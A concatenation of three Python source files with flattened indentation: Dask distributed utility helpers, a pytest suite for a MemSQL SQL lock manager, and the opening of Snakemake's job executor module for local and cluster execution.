widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def is_writeable(frame):
"""
Check whether frame is writeable
Will return ``True`` if writeable, ``False`` if readonly, and
``None`` if undetermined.
"""
try:
return not memoryview(frame).readonly
except TypeError:
return None
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
is_server_extension = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
is_server_extension = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not is_server_extension:
is_kernel_and_no_running_loop = False
if is_kernel():
try:
get_running_loop()
except RuntimeError:
is_kernel_and_no_running_loop = True
if not is_kernel_and_no_running_loop:
# TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below,
# once tornado > 6.0.3 is available.
if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"):
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
# https://github.com/tornadoweb/tornado/issues/2608
BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy
else:
BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy
class AnyThreadEventLoopPolicy(BaseEventLoopPolicy):
def get_event_loop(self):
try:
return super().get_event_loop()
except (RuntimeError, AssertionError):
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = set(
[
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
]
)
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def typename(typ):
"""Return name of type
Examples
--------
>>> from distributed import Scheduler
>>> typename(Scheduler)
'distributed.scheduler.Scheduler'
"""
try:
return typ.__module__ + "." + typ.__name__
except AttributeError:
return str(typ)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
    >>> parse_ports(8787)
    [8787]
    or a string:
    >>> parse_ports("8787")
    [8787]
    A sequential range of ports can be specified by a string which indicates
    the first and last ports which should be included in the sequence of ports:
    >>> parse_ports("8787:8790")
    [8787, 8788, 8789, 8790]
    An input of ``None`` is also valid and can be used to indicate that no port
    has been specified:
    >>> parse_ports(None)
    [None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"port_start={port_start} and port_stop={port_stop}"
)
ports = list(range(port_start, port_stop + 1))
return ports
def is_coroutine_function(f):
return asyncio.iscoroutinefunction(f) or gen.is_coroutine_function(f)
class Log(str):
""" A container for logs """
def _repr_html_(self):
return "<pre><code>\n{log}\n</code></pre>".format(
log=html.escape(self.rstrip())
)
class Logs(dict):
""" A container for multiple logs """
def _repr_html_(self):
summaries = [
"<details>\n"
"<summary style='display:list-item'>{title}</summary>\n"
"{log}\n"
"</details>".format(title=title, log=log._repr_html_())
for title, log in sorted(self.items())
]
return "\n".join(summaries)
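# A minimal usage sketch (added for illustration; the worker names are
# hypothetical): Log renders one log as an HTML <pre> block, while Logs wraps
# several of them in collapsible <details> sections keyed by title.
def _logs_repr_example():
    """Illustrative only: build a Logs mapping and return its HTML form."""
    logs = Logs(
        {
            "worker-1": Log("INFO - worker started\nINFO - ready"),
            "worker-2": Log("WARNING - low memory"),
        }
    )
    return logs._repr_html_()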
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d: dict
The keywords to convert
cls: callable
The callable that consumes these terms to check them for validity
cmd: string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
        It may be used to parse a module's custom arguments (i.e., arguments that
        are not part of the Worker class), such as nprocs from the dask-worker CLI
        or enable_nvlink from the dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
                    raise ValueError(
                        "Neither class %s nor module %s supports keyword %s"
                        % (typename(cls), typename(cmd), k)
                    )
elif cls:
raise ValueError(
"Class %s does not support keyword %s" % (typename(cls), k)
)
else:
raise ValueError(
"Module %s does not support keyword %s" % (typename(cmd), k)
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
[["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
try:
_offload_executor = ThreadPoolExecutor(
max_workers=1, thread_name_prefix="Dask-Offload"
)
except TypeError:
_offload_executor = ThreadPoolExecutor(max_workers=1)
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin")
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs))
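# A minimal usage sketch (added for illustration; the coroutine below is
# hypothetical): offload pushes a blocking call onto the single-threaded
# "Dask-Offload" executor so the running event loop is not blocked. md5 here
# is the same md5 already used by color_of above.
async def _offload_example():
    """Illustrative only: hash a payload off the event loop and await it."""
    digest = await offload(md5, b"x" * 1000)
    return digest.hexdigest()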
def serialize_for_cli(data):
"""Serialize data into a string that can be passthrough cli
Parameters
----------
data: json-serializable object
The data to serialize
Returns
-------
serialized_data: str
The serialized data as a string
"""
return base64.urlsafe_b64encode(json.dumps(data).encode()).decode()
def deserialize_for_cli(data):
"""De-serialize data into the original object
Parameters
----------
data: str
        String serialized by serialize_for_cli()
Returns
-------
deserialized_data: obj
The de-serialized data
"""
return json.loads(base64.urlsafe_b64decode(data.encode()).decode())
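# A minimal round-trip sketch (added for illustration; the config dict is
# hypothetical): serialize_for_cli yields a plain base64 string that can be
# passed through a command line, and deserialize_for_cli restores the object.
def _cli_serialization_example():
    """Illustrative only: encode a small dict and decode it back unchanged."""
    original = {"scheduler": "tcp://127.0.0.1:8786", "retries": 3}
    encoded = serialize_for_cli(original)  # safe to pass as a CLI argument
    assert deserialize_for_cli(encoded) == original
    return encoded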
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
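# A minimal usage sketch (added for illustration; the keys are hypothetical):
# LRU keeps at most ``maxsize`` entries and, on insertion beyond that size,
# evicts the key that was looked up least recently.
def _lru_example():
    """Illustrative only: touching "a" makes "b" the eviction candidate."""
    cache = LRU(maxsize=2)
    cache["a"] = 1
    cache["b"] = 2
    assert cache["a"] == 1  # the lookup moves "a" to the most-recently-used slot
    cache["c"] = 3  # inserting beyond maxsize evicts "b", the stalest key
    return sorted(cache)  # ['a', 'c']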
def clean_dashboard_address(addr, default_listen_ip=""):
"""
Examples
--------
>>> clean_dashboard_address(8787)
{'address': '', 'port': 8787}
>>> clean_dashboard_address(":8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("8787")
{'address': '', 'port': 8787}
>>> clean_dashboard_address("foo:8787")
{'address': 'foo', 'port': 8787}
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
return {"address": host, "port": port}
|
test_sql_lock.py
|
import pytest
import time
import threading
from memsql.common import database
from memsql.common import sql_lock
from memsql.common import exceptions
@pytest.fixture(scope="module")
def manager_setup(request, test_db_args, test_db_database):
with database.connect(**test_db_args) as conn:
conn.execute('CREATE DATABASE IF NOT EXISTS %s' % test_db_database)
test_db_args['database'] = test_db_database
q = sql_lock.SQLLockManager('test').connect(**test_db_args).setup()
def cleanup():
q.destroy()
request.addfinalizer(cleanup)
@pytest.fixture
def manager(manager_setup, test_db_args, test_db_database):
test_db_args['database'] = test_db_database
m = sql_lock.SQLLockManager('test').connect(**test_db_args)
with m._db_conn() as conn:
conn.query('DELETE FROM %s' % m.table_name)
return m
def test_ensure_connected():
q = sql_lock.SQLLockManager('bad_manager')
with pytest.raises(exceptions.NotConnected):
q.acquire('asdf')
def test_basic(manager):
assert manager.ready()
def test_basic_usage(manager):
l = manager.acquire('asdf', owner="test")
assert l.valid()
assert l.owner == 'test'
with manager._db_conn() as conn:
rows = conn.query('SELECT * FROM %s' % manager.table_name)
assert len(rows) == 1
assert rows[0].owner == 'test'
assert rows[0].id == 'asdf'
assert rows[0].lock_hash == l._lock_hash
def test_threading(manager):
arr = []
def _test():
with manager.acquire('test') as l:
assert l.valid()
arr.append(1)
time.sleep(0.1)
assert len(arr) == 1
arr.pop()
threads = [threading.Thread(target=_test) for i in range(10)]
[t.start() for t in threads]
[t.join() for t in threads]
def test_ping(manager):
l = manager.acquire('test')
with manager._db_conn() as conn:
first = conn.get('SELECT last_contact FROM %s WHERE id=%%s' % manager.table_name, l._lock_id).last_contact
time.sleep(1)
l.ping()
with manager._db_conn() as conn:
assert first != conn.get('SELECT last_contact FROM %s WHERE id=%%s' % manager.table_name, l._lock_id).last_contact
def test_timeout(manager):
l = manager.acquire('test', expiry=1)
time.sleep(1)
assert not l.valid()
assert manager.acquire('test') is not None
def test_non_block(manager):
manager.acquire('test')
assert manager.acquire('test') is None
def test_block_timeout(manager):
acquired = []
def _test():
acquired.append(manager.acquire('test', block=True, timeout=0.5))
# acquire the lock first
manager.acquire('test')
# this will fail to acquire
t = threading.Thread(target=_test)
start = time.time()
t.start()
t.join()
diff = time.time() - start
assert diff >= 0.5
assert acquired[0] is None
def test_release(manager):
l = manager.acquire('test')
assert l.valid()
l.release()
assert not l.valid()
assert not l.ping()
assert not l.release()
assert manager.acquire('test') is not None
|
__init__.py
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2022, Johannes Köster"
__email__ = "johannes.koester@uni-due.de"
__license__ = "MIT"
import os
import sys
import contextlib
import time
import datetime
import json
import textwrap
import stat
import shutil
import shlex
import threading
import concurrent.futures
import subprocess
import signal
import tempfile
import threading
from functools import partial
from itertools import chain
from collections import namedtuple
from snakemake.io import _IOFile
import random
import base64
import uuid
import re
import math
from snakemake.jobs import Job
from snakemake.shell import shell
from snakemake.logging import logger
from snakemake.stats import Stats
from snakemake.utils import format, Unformattable, makedirs
from snakemake.io import get_wildcard_names, Wildcards
from snakemake.exceptions import print_exception, get_exception_origin
from snakemake.exceptions import format_error, RuleException, log_verbose_traceback
from snakemake.exceptions import (
ProtectedOutputException,
WorkflowError,
ImproperShadowException,
SpawnedJobError,
CacheMissException,
)
from snakemake.common import Mode, __version__, get_container_image, get_uuid
# TODO move each executor into a separate submodule
def sleep():
# do not sleep on CI. In that case we just want to quickly test everything.
if os.environ.get("CI") != "true":
time.sleep(10)
class AbstractExecutor:
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
printthreads=True,
latency_wait=3,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.dag = dag
self.quiet = quiet
self.printreason = printreason
self.printshellcmds = printshellcmds
self.printthreads = printthreads
self.latency_wait = latency_wait
self.keepincomplete = keepincomplete
self.keepmetadata = keepmetadata
def get_default_remote_provider_args(self):
if self.workflow.default_remote_provider:
return (
" --default-remote-provider {} " "--default-remote-prefix {} "
).format(
self.workflow.default_remote_provider.__module__.split(".")[-1],
self.workflow.default_remote_prefix,
)
return ""
def _format_key_value_args(self, flag, kwargs):
if kwargs:
return " {} {} ".format(
flag,
" ".join("{}={}".format(key, value) for key, value in kwargs.items()),
)
return ""
def get_set_threads_args(self):
return self._format_key_value_args(
"--set-threads", self.workflow.overwrite_threads
)
def get_set_resources_args(self):
if self.workflow.overwrite_resources:
return " --set-resources {} ".format(
" ".join(
"{}:{}={}".format(rule, name, value)
for rule, res in self.workflow.overwrite_resources.items()
for name, value in res.items()
)
)
return ""
def get_set_scatter_args(self):
return self._format_key_value_args(
"--set-scatter", self.workflow.overwrite_scatter
)
def get_default_resources_args(self, default_resources=None):
if default_resources is None:
default_resources = self.workflow.default_resources
if default_resources:
def fmt(res):
if isinstance(res, str):
res = res.replace('"', r"\"")
return '"{}"'.format(res)
args = " --default-resources {} ".format(
" ".join(map(fmt, self.workflow.default_resources.args))
)
return args
return ""
def get_local_groupid_arg(self):
return f" --local-groupid {self.workflow.local_groupid} "
def get_behavior_args(self):
if self.workflow.conda_not_block_search_path_envvars:
return " --conda-not-block-search-path-envvars "
return ""
def run_jobs(self, jobs, callback=None, submit_callback=None, error_callback=None):
"""Run a list of jobs that is ready at a given point in time.
By default, this method just runs each job individually.
        This method can be overridden to submit many jobs in a more efficient
        way than one-by-one.
Note that in any case, for each job, the callback functions have to be called individually!
"""
for job in jobs:
self.run(
job,
callback=callback,
submit_callback=submit_callback,
error_callback=error_callback,
)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
"""Run a specific job or group job."""
self._run(job)
callback(job)
def shutdown(self):
pass
def cancel(self):
pass
def _run(self, job):
job.check_protected_output()
self.printjob(job)
def rule_prefix(self, job):
return "local " if job.is_local else ""
def printjob(self, job):
job.log_info(skip_dynamic=True)
def print_job_error(self, job, msg=None, **kwargs):
job.log_error(msg, **kwargs)
def handle_job_success(self, job):
pass
def handle_job_error(self, job):
pass
class DryrunExecutor(AbstractExecutor):
def printjob(self, job):
super().printjob(job)
if job.is_group():
for j in job.jobs:
self.printcache(j)
else:
self.printcache(job)
def printcache(self, job):
if self.workflow.is_cached_rule(job.rule):
if self.workflow.output_file_cache.exists(job):
logger.info(
"Output file {} will be obtained from global between-workflow cache.".format(
job.output[0]
)
)
else:
logger.info(
"Output file {} will be written to global between-workflow cache.".format(
job.output[0]
)
)
class RealExecutor(AbstractExecutor):
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.assume_shared_fs = assume_shared_fs
self.stats = Stats()
self.snakefile = workflow.main_snakefile
def register_job(self, job):
job.register()
def _run(self, job, callback=None, error_callback=None):
super()._run(job)
self.stats.report_job_start(job)
try:
self.register_job(job)
except IOError as e:
logger.info(
"Failed to set marker file for job started ({}). "
"Snakemake will work, but cannot ensure that output files "
"are complete in case of a kill signal or power loss. "
"Please ensure write permissions for the "
"directory {}".format(e, self.workflow.persistence.path)
)
def handle_job_success(
self,
job,
upload_remote=True,
handle_log=True,
handle_touch=True,
ignore_missing_output=False,
):
job.postprocess(
upload_remote=upload_remote,
handle_log=handle_log,
handle_touch=handle_touch,
ignore_missing_output=ignore_missing_output,
latency_wait=self.latency_wait,
assume_shared_fs=self.assume_shared_fs,
keep_metadata=self.keepmetadata,
)
self.stats.report_job_end(job)
def handle_job_error(self, job, upload_remote=True):
job.postprocess(
error=True,
assume_shared_fs=self.assume_shared_fs,
latency_wait=self.latency_wait,
)
def get_additional_args(self):
"""Return a string to add to self.exec_job that includes additional
arguments from the command line. This is currently used in the
ClusterExecutor and CPUExecutor, as both were using the same
        code. Both have RealExecutor as their base class.
"""
additional = ""
if not self.workflow.cleanup_scripts:
additional += " --skip-script-cleanup "
if self.workflow.shadow_prefix:
additional += " --shadow-prefix {} ".format(self.workflow.shadow_prefix)
if self.workflow.use_conda:
additional += " --use-conda "
if self.workflow.conda_frontend:
additional += " --conda-frontend {} ".format(
self.workflow.conda_frontend
)
if self.workflow.conda_prefix:
additional += " --conda-prefix {} ".format(self.workflow.conda_prefix)
if self.workflow.conda_base_path and self.assume_shared_fs:
additional += " --conda-base-path {} ".format(
self.workflow.conda_base_path
)
if self.workflow.use_singularity:
additional += " --use-singularity "
if self.workflow.singularity_prefix:
additional += " --singularity-prefix {} ".format(
self.workflow.singularity_prefix
)
if self.workflow.singularity_args:
additional += ' --singularity-args "{}"'.format(
self.workflow.singularity_args
)
if not self.workflow.execute_subworkflows:
additional += " --no-subworkflows "
if self.workflow.max_threads is not None:
additional += " --max-threads {} ".format(self.workflow.max_threads)
additional += self.get_set_resources_args()
additional += self.get_set_scatter_args()
additional += self.get_set_threads_args()
additional += self.get_behavior_args()
if self.workflow.use_env_modules:
additional += " --use-envmodules "
if not self.keepmetadata:
additional += " --drop-metadata "
return additional
def format_job_pattern(self, pattern, job=None, **kwargs):
overwrite_workdir = []
if self.workflow.overwrite_workdir:
overwrite_workdir.extend(("--directory", self.workflow.overwrite_workdir))
overwrite_config = []
if self.workflow.overwrite_configfiles:
# add each of the overwriting configfiles in the original order
if self.workflow.overwrite_configfiles:
overwrite_config.append("--configfiles")
overwrite_config.extend(self.workflow.overwrite_configfiles)
if self.workflow.config_args:
overwrite_config.append("--config")
overwrite_config.extend(self.workflow.config_args)
printshellcmds = ""
if self.workflow.printshellcmds:
printshellcmds = "-p"
if not job.is_branched and not job.is_updated:
# Restrict considered rules. This does not work for updated jobs
# because they need to be updated in the spawned process as well.
rules = ["--allowed-rules"]
rules.extend(job.rules)
else:
rules = []
target = kwargs.get("target", job.get_targets())
snakefile = kwargs.get("snakefile", self.snakefile)
cores = kwargs.get("cores", self.cores)
if "target" in kwargs:
del kwargs["target"]
if "snakefile" in kwargs:
del kwargs["snakefile"]
if "cores" in kwargs:
del kwargs["cores"]
cmd = format(
pattern,
job=job,
attempt=job.attempt,
overwrite_workdir=overwrite_workdir,
overwrite_config=overwrite_config,
printshellcmds=printshellcmds,
workflow=self.workflow,
snakefile=snakefile,
cores=cores,
benchmark_repeats=job.benchmark_repeats if not job.is_group() else None,
target=target,
rules=rules,
**kwargs,
)
return cmd
class TouchExecutor(RealExecutor):
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
try:
# Touching of output files will be done by handle_job_success
time.sleep(0.1)
callback(job)
except OSError as ex:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job, ignore_missing_output=True)
_ProcessPoolExceptions = (KeyboardInterrupt,)
try:
from concurrent.futures.process import BrokenProcessPool
_ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool)
except ImportError:
pass
class CPUExecutor(RealExecutor):
def __init__(
self,
workflow,
dag,
workers,
printreason=False,
quiet=False,
printshellcmds=False,
use_threads=False,
latency_wait=3,
cores=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.exec_job = "\\\n".join(
(
"cd {workflow.workdir_init} && ",
"{sys.executable} -m snakemake {target} --snakefile {snakefile} ",
"--force --cores {cores} --keep-target-files --keep-remote ",
"--attempt {attempt} --scheduler {workflow.scheduler_type} ",
"--force-use-threads --wrapper-prefix {workflow.wrapper_prefix} ",
"--max-inventory-time 0 --ignore-incomplete ",
"--latency-wait {latency_wait} ",
self.get_default_remote_provider_args(),
self.get_default_resources_args(),
self.get_local_groupid_arg(),
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ",
"--notemp --quiet --no-hooks --nolock --mode {} ".format(
Mode.subprocess
),
)
)
self.exec_job += self.get_additional_args()
self.use_threads = use_threads
self.cores = cores
# Zero thread jobs do not need a thread, but they occupy additional workers.
# Hence we need to reserve additional workers for them.
self.workers = workers + 5
self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.workers)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
if job.is_group():
# if we still don't have enough workers for this group, create a new pool here
missing_workers = max(len(job) - self.workers, 0)
if missing_workers:
self.workers += missing_workers
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=self.workers
)
# the future waits for the entire group job
future = self.pool.submit(self.run_group_job, job)
else:
future = self.run_single_job(job)
future.add_done_callback(partial(self._callback, job, callback, error_callback))
def job_args_and_prepare(self, job):
job.prepare()
conda_env = (
job.conda_env.address if self.workflow.use_conda and job.conda_env else None
)
container_img = (
job.container_img_path if self.workflow.use_singularity else None
)
env_modules = job.env_modules if self.workflow.use_env_modules else None
benchmark = None
benchmark_repeats = job.benchmark_repeats or 1
if job.benchmark is not None:
benchmark = str(job.benchmark)
return (
job.rule,
job.input._plainstrings(),
job.output._plainstrings(),
job.params,
job.wildcards,
job.threads,
job.resources,
job.log._plainstrings(),
benchmark,
benchmark_repeats,
conda_env,
container_img,
self.workflow.singularity_args,
env_modules,
self.workflow.use_singularity,
self.workflow.linemaps,
self.workflow.debug,
self.workflow.cleanup_scripts,
job.shadow_dir,
job.jobid,
self.workflow.edit_notebook if self.dag.is_edit_notebook_job(job) else None,
self.workflow.conda_base_path,
job.rule.basedir,
self.workflow.sourcecache.runtime_cache_path,
)
def run_single_job(self, job):
if (
self.use_threads
or (not job.is_shadow and not job.is_run)
or job.is_template_engine
):
future = self.pool.submit(
self.cached_or_run, job, run_wrapper, *self.job_args_and_prepare(job)
)
else:
# run directive jobs are spawned into subprocesses
future = self.pool.submit(self.cached_or_run, job, self.spawn_job, job)
return future
def run_group_job(self, job):
"""Run a pipe or service group job.
This lets all items run simultaneously."""
# we only have to consider pipe or service groups because in local running mode,
# these are the only groups that will occur
futures = [self.run_single_job(j) for j in job]
n_non_service = sum(1 for j in job if not j.is_service)
while True:
n_finished = 0
for f in futures:
if f.done():
ex = f.exception()
if ex is not None:
# kill all shell commands of the other group jobs
# there can be only shell commands because the
# run directive is not allowed for pipe jobs
for j in job:
shell.kill(j.jobid)
raise ex
else:
n_finished += 1
if n_finished >= n_non_service:
# terminate all service jobs since all consumers are done
for j in job:
if j.is_service:
logger.info(
f"Terminating service job {j.jobid} since all consuming jobs are finished."
)
shell.terminate(j.jobid)
logger.info(
f"Service job {j.jobid} has been successfully terminated."
)
return
time.sleep(1)
def spawn_job(self, job):
exec_job = self.exec_job
cmd = self.format_job_pattern(
exec_job, job=job, _quote_all=True, latency_wait=self.latency_wait
)
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
raise SpawnedJobError()
def cached_or_run(self, job, run_func, *args):
"""
Either retrieve result from cache, or run job with given function.
"""
to_cache = self.workflow.is_cached_rule(job.rule)
try:
if to_cache:
self.workflow.output_file_cache.fetch(job)
return
except CacheMissException:
pass
run_func(*args)
if to_cache:
self.workflow.output_file_cache.store(job)
def shutdown(self):
self.pool.shutdown()
def cancel(self):
self.pool.shutdown()
def _callback(self, job, callback, error_callback, future):
try:
ex = future.exception()
if ex is not None:
raise ex
callback(job)
except _ProcessPoolExceptions:
self.handle_job_error(job)
# no error callback, just silently ignore the interrupt as the main scheduler is also killed
except SpawnedJobError:
# don't print error message, this is done by the spawned subprocess
error_callback(job)
except (Exception, BaseException) as ex:
self.print_job_error(job)
if not (job.is_group() or job.shellcmd) or self.workflow.verbose:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job)
def handle_job_error(self, job):
super().handle_job_error(job)
if not self.keepincomplete:
job.cleanup()
self.workflow.persistence.cleanup(job)
class ClusterExecutor(RealExecutor):
"""Backend for distributed execution.
    The key idea is that a job is converted into a script that invokes
    Snakemake again, in whatever environment is targeted. The script is
    submitted to some job management platform (e.g. a cluster scheduler
    like Slurm).
This class can be specialized to generate more specific backends, also for the cloud.
"""
default_jobscript = "jobscript.sh"
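    # Typical flow through this class: write_jobscript() renders self.jobscript
    # around a formatted exec_job command line, a concrete subclass submits the
    # resulting script (e.g. GenericClusterExecutor via its submitcmd), and the
    # background _wait_for_jobs() thread polls the submitted jobs, firing
    # callback or error_callback as they finish.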
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{name}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
exec_job=None,
assume_shared_fs=True,
max_status_checks_per_second=1,
disable_default_remote_provider_args=False,
disable_get_default_resources_args=False,
keepincomplete=False,
keepmetadata=True,
):
from ratelimiter import RateLimiter
local_input = local_input or []
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
assume_shared_fs=assume_shared_fs,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
if not self.assume_shared_fs:
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
jobscript = workflow.jobscript
if jobscript is None:
jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript)
try:
with open(jobscript) as f:
self.jobscript = f.read()
except IOError as e:
raise WorkflowError(e)
        if "jobid" not in get_wildcard_names(jobname):
            raise WorkflowError(
                'Defined jobname ("{}") has to contain the wildcard {{jobid}}.'.format(
                    jobname
                )
            )
if exec_job is None:
self.exec_job = "\\\n".join(
(
"{envvars} " "cd {workflow.workdir_init} && "
if assume_shared_fs
else "",
"{sys.executable} " if assume_shared_fs else "python ",
"-m snakemake {target} --snakefile {snakefile} ",
"--force --cores {cores} --keep-target-files --keep-remote --max-inventory-time 0 ",
"{waitfiles_parameter:u} --latency-wait {latency_wait} ",
" --attempt {attempt} {use_threads} --scheduler {workflow.scheduler_type} ",
"--wrapper-prefix {workflow.wrapper_prefix} ",
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} "
"--nocolor --notemp --no-hooks --nolock {scheduler_solver_path:u} ",
"--mode {} ".format(Mode.cluster),
)
)
else:
self.exec_job = exec_job
self.exec_job += self.get_additional_args()
self.exec_job += " {job_specific_args:u} "
if not disable_default_remote_provider_args:
self.exec_job += self.get_default_remote_provider_args()
if not disable_get_default_resources_args:
self.exec_job += self.get_default_resources_args()
self.jobname = jobname
self._tmpdir = None
self.cores = cores if cores else "all"
